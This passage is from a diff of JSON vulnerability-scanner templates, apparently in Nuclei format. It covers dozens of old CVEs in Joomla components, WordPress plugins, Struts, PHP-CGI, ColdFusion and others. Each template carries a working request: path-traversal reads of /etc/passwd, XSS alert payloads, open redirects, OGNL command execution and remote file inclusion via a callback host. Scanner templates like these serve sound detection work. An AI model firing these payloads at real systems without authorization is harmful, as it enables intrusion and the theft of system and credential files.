Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]}]}
\ No newline at end of file
+{"templates":[{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5('CVE-2012-1823'); ?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3d638155445bffb044eec401381ad784"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File 